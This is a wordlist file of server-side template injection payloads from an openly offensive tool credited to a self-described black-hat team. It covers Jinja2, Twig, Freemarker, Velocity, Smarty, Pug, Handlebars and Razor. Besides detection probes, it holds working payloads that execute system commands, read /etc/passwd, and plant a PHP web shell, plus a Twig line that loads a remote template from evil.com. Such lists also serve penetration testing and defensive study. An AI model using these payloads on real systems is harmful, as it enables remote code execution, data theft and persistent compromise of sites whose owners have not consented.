# wordlists/ssti_payloads.txt
# WOLFSTRIKE SSTI Payloads
# Author: ATHEX BLACK HAT | Team: Wolf Intelligence PK
# Categories: Jinja2, Twig, Freemarker, Velocity, Smarty, Jade

# === GENERIC SSTI DETECTION ===
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
${{7*7}}
{{7*'7'}}
{{7+7}}
${7+7}
<%= 7+7 %>
#{7+7}

# === JINJA2 (PYTHON) PAYLOADS ===
{{config}}
{{config.items()}}
{{self.__init__.__globals__}}
{{self.__class__.__mro__}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__}}
{{get_flashed_messages.__globals__}}
{{url_for.__globals__}}
{{lipsum.__globals__}}
{{cycler.__init__.__globals__}}
{{joiner.__init__.__globals__}}
{{namespace.__init__.__globals__}}
{{dict.__init__.__globals__}}
{{''.__class__.__mro__[1].__subclasses__()}}
{% debug %}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
{{ request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('os')|attr('popen')('id')|attr('read')() }}
{{ ''.__class__.__mro__[1].__subclasses__()[X].__init__.__globals__['os'].popen('id').read() }}

# === TWIG (PHP) PAYLOADS ===
{{_self.env.registerUndefinedFilterCallback("exec")}}
{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('whoami')}}
{{['id', '']|sort('system')}}
{{['cat /etc/passwd']|filter('file_get_contents')}}
{{_self.env.loadTemplate("http://evil.com/shell.twig")}}

# === FREEMARKER (JAVA) PAYLOADS ===
${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("cat /etc/passwd")}
<#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex("java.lang.ProcessBuilder","id").start()}
<#assign ex="freemarker.template.utility.JythonRuntime"?new()><@ex>import os;os.system("id")</@ex>
${"freemarker.template.utility.Execute"?new()("id")}

# === VELOCITY (JAVA) PAYLOADS ===
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($ex=$rt.getRuntime().exec('id'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$out.read()#end

# === SMARTY (PHP) PAYLOADS ===
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile(['./shell.php'], '<?php system($_GET["cmd"]); ?>')}
{system('id')}
{$smarty.template_object->smarty->enableSecurity()}{system('id')}

# === JADE/PUG (NODE.JS) PAYLOADS ===
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad('child_process').exec('id')}()}
#{root.process.mainModule.require('child_process').execSync('id').toString()}
#{global.process.mainModule.constructor._load('child_process').exec('id')}

# === HANDLEBARS (NODE.JS) PAYLOADS ===
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').execSync('id').toString();"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

# === MUSTACHE (VARIOUS) PAYLOADS ===
{{>../../etc/passwd}}
{{#lambda}}{{/lambda}}
{{#data}}{{#each}}{{/each}}{{/data}}

# === RAZOR (.NET) PAYLOADS ===
@(7*7)
@(System.Diagnostics.Process.Start("cmd.exe","/c whoami"))
@{System.Diagnostics.Process.Start("cmd.exe","/c whoami")}

# === PATENT (UNKNOWN TEMPLATE) ===
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
[[7*7]]
{$7*7}
[% 7*7 %]
{% 7*7 %}
@(7*7)
{{= 7*7}}